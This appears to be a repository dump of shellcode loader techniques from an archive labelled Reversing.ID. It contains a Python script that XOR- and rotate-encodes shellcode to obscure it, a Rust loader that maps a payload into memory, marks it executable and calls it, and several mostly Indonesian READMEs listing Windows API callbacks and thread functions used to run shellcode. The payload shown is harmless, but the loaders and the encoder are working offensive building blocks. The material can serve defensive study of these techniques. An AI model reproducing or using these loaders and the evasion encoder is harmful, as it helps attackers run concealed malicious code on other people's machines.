12 | 
13 | cross = lambda L,R: (high(L) | low(R), high(R) | low(L))
14 | 
15 | 
16 | with open("shellcode.bin", "rb") as f:
17 |     shcode = f.read()
18 | shlen = len(shcode)
19 | 
20 | # generate single byte key
21 | key = random.randrange(1,255)
22 | 
23 | # make sure shellcode is even-length
24 | if shlen % 2 == 1:
25 |     shcode += b"\x90"
26 |     shlen  += 1
27 | 
28 | # encode shellcode
29 | enc_shcode = [key]
30 | idx = 0
31 | while idx < shlen:
32 |     L = shcode[idx    ]     # LEFT
33 |     R = shcode[idx + 1]     # RIGHT
34 | 
35 |     # get half of each byte and cross
36 |     L, R = cross(L, R)
37 | 
38 |     # rotate then XOR
39 |     enc_shcode.append(rotl8(L, 3) ^ key)
40 |     enc_shcode.append(rotr8(R, 3) ^ key)
41 | 
42 |     idx += 2
43 | 
44 | # print as C-array
45 | print("{ ", end='')
46 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
47 | print(" }")


--------------------------------------------------------------------------------
/windows/execution/event/CreateThreadpoolTimer/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode using timer.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateThreadpoolTimer`.
 8 | 
 9 | Thread pool adalah sekumpulan worker thread yang mengeksekusi callback secara asinkron.
10 | 
11 | ```c++
12 | PTP_TIMER CreateThreadpoolTimer(PTP_TIMER_CALLBACK pfnti, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
13 | 
14 | void SetThreadpoolTimer(PTP_TIMER pti, PFILETIME pftDueTime, DWORD msPeriod, DWORD msWindowLength);
15 | 
16 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);
17 | 
18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
19 | ```
20 | 
21 | ### Reference 
22 | 
23 | - [MSDN CreateThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpooltimer)
24 | - [MSDN SetThreadpoolTimer](https://docs.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-setthreadpooltimer)
25 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
26 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/writing/misc/rust/memmap2/src/main.rs:
--------------------------------------------------------------------------------
 1 | /*
 2 |     Shellcode Loader
 3 |     Archive of Reversing.ID
 4 | 
 5 |     Allocation and change permission with memmap2.
 6 |     memmap2 is a wrapper to memory operations (not only in windows).
 7 | 
 8 | Compile:
 9 |     $ cargo build
10 | 
11 | Technique:
12 |     - allocation:   VirtualAlloc
13 |     - writing:      
14 |     - permission:   
15 |     - execution:    unsafe call to function pointer
16 | */
17 | 
18 | use memmap2::MmapOptions;
19 | use std::mem::transmute;
20 | 
21 | fn main() {
22 |     // shellcode storage in stack
23 |     let payload: [u8; 4] = [0x90, 0x90, 0xCC, 0xC3];
24 | 
25 |     // allocate memory buffer for payload as READ-WRITE (no executable)
26 |     let mut mmap = MmapOptions::new()
27 |         .len(payload.len())
28 |         .map_anon()
29 |         .expect("[-] unable to allocate");
30 | 
31 |     // copy payload to the buffer
32 |     mmap.copy_from_slice(&payload);
33 | 
34 |     // make buffer executable (R-X)
35 |     let mmap = mmap
36 |         .make_exec()
37 |         .expect("[-] unable to change permission");
38 | 
39 |     // cast the payload into function and execute
40 |     unsafe {
41 |         let ep: extern "C" fn() = transmute(mmap.as_ptr());
42 |         ep();
43 |     }
44 | }
45 | 


--------------------------------------------------------------------------------
/windows/execution/callback/CertFindChainInStore/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CertFindChainInStore`.
 8 | 
 9 | ```c++
10 | PCCERT_CHAIN_CONTEXT CertFindChainInStore (HCERTSTORE hCertStore, DWORD dwCertEncodingType, DWORD dwFindFlags, DWORD dwFindType, const void *pvFindPara, PCCERT_CHAIN_CONTEXT pPrevChainContext);
11 | 
12 | HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);
13 | 
14 | HCERTSTORE CertOpenSystemStoreA (HCRYPTPROV_LEGACY hProv, LPCSTR szSubsystemProtocol);
15 | 
16 | HCERTSTORE CertOpenSystemStoreW (HCRYPTPROV_LEGACY hProv, LPCWSTR szSubsystemProtocol);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN CertFindChainInStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certfindchaininstore)
22 | - [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
23 | - [MSDN CertOpenSystemStoreA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorea)
24 | - [MSDN CertOpenSystemStoreW](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorew)


--------------------------------------------------------------------------------
/windows/allocation/NtAllocateVirtualMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi dengan `NtAllocateVirtualMemory` dan dealokasi dengan `NtFreeVirtualMemory`.
 8 | 
 9 | ```c++
10 | NTSTATUS NtAllocateVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect);
11 | 
12 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);
13 | 
14 | NTSTATUS NtFreeVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG RegionSize, ULONG FreeType);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [NTInternals NtAllocateVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html)
20 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html)
21 | - [NTInternals NtFreeVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtFreeVirtualMemory.html)
22 | 


--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModulesEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumerateLoadedModulesEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumerateLoadedModulesEx (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOIDUserContext);
11 | 
12 | BOOL EnumerateLoadedModulesExW (HANDLEhProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);
13 | 
14 | BOOL EnumerateLoadedModules64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOIDUserContext);
15 | 
16 | BOOL EnumerateLoadedModulesW64 (HANDLEhProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN EnumerateLoadedModulesEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesex)
22 | - [MSDN EnumerateLoadedModulesExW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesexw)
23 | - [MSDN EnumerateLoadedModules64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules64)
24 | - [MSDN EnumerateLoadedModulesW64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesw64)


--------------------------------------------------------------------------------
/windows/execution/callback/CryptInstallOIDFunctionAddress/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptInstallOIDFunctionAddress`.
 8 | 
 9 | Install fungsi sebagai callback saat membuka store baru.
10 | 
11 | ```c++
12 | BOOL CryptInstallOIDFunctionAddress(HMODULE hModule, DWORD dwEncodingType, LPCSTR pszFuncName, DWORD cFuncEntry, const CRYPT_OID_FUNC_ENTRY [] rgFuncEntry, DWORD dwFlags);
13 | 
14 | BOOL CryptFreeOIDFunctionAddress (HCRYPTOIDFUNCADDR hFuncAddr, DWORD dwFlags);
15 | 
16 | HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);
17 | 
18 | BOOL CertCloseStore (HCERTSTORE hCertStore, DWORD dwFlags);
19 | ```
20 | 
21 | ### Reference 
22 | 
23 | - [MSDN CryptInstallOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptinstalloidfunctionaddress)
24 | - [MSDN CryptFreeOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptfreeoidfunctionaddress)
25 | - [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
26 | - [MSDN CertCloseStore](https://docs.microsoft.com/en-us/windows/win32/api/Wincrypt/nf-wincrypt-certclosestore)
27 | 


--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThreadEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateRemoteThreadEx` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | `CreateRemoteThread` umumnya digunakan untuk menjalankan thread di remote process. Namun thread baru dapat pula dieksekusi di process sendiri dengan memberikan handle `hProcess` bernilai `GetCurrentProcess()`.
10 | 
11 | Perbedaan antara `CreateRemoteThread` dan `CreateRemoteThreadEx` terletak pada adanya parameter `lpThreadId` yang memungkinkan untuk mendapatkan thread ID dari thread yang baru dipanggil.
12 | 
13 | ```c++
14 | HANDLE CreateRemoteThreadEx (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, LPDWORD lpThreadId
15 | 
16 | );
17 | 
18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
19 | ```
20 | 
21 | ### Reference 
22 | 
23 | - [MSDN CreateRemoteThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
24 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumProps/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumProps`.
 8 | 
 9 | ```c++
10 | int EnumPropsA (HWND hWnd, PROPENUMPROCA lpEnumFunc);
11 | 
12 | int EnumPropsW (HWND hWnd, PROPENUMPROCW lpEnumFunc);
13 | 
14 | BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData);
15 | 
16 | BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData);
17 | 
18 | HANDLE RemovePropA (HWND hWnd, LPCSTR lpString);
19 | 
20 | HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString);
21 | ```
22 | 
23 | ### Reference 
24 | 
25 | - [MSDN EnumPropsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsa)
26 | - [MSDN EnumPropsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsw)
27 | - [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa)
28 | - [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw)
29 | - [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa)
30 | - [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw)
31 | - [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow)


--------------------------------------------------------------------------------
/windows/writing/conversion/endianness/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan konversi endianness (little-endian dan big-endian byte order).
 8 | 
 9 | Endian adalah urutan byte dari sebuah bilangan jika direpresentasikan di memory. Dalam representasi big-endian, penulisan byte diawali dari most-significant byte. Sementara little-endian diawali dari least-significant byte.
10 | 
11 | Konversi antara little-endian dan big-endian dapat dilakukan melalui fungsi `ntoh` dan `hton`, dimana fungsi ntoh (network to host) mengasumsikan bilangan dalam big-endian dan akan dikonversi menjadi little endian. Sementara hton sebaliknya.
12 | 
13 | 
14 | ```c++
15 | uint32_t htonl (uint32_t hostlong);
16 | uint64_t htonll (uint64_t hostlong);
17 | 
18 | uint32_t ntohl (uint32_t netlong);
19 | uint64_t ntohll (uint64_t netlong);
20 | ```
21 | 
22 | ### Reference
23 | 
24 | - [MSDN htonl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonl)
25 | - [MSDN htonll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonll)
26 | - [MSDN ntohl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohl)
27 | - [MSDN ntohll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohll)
28 | 


--------------------------------------------------------------------------------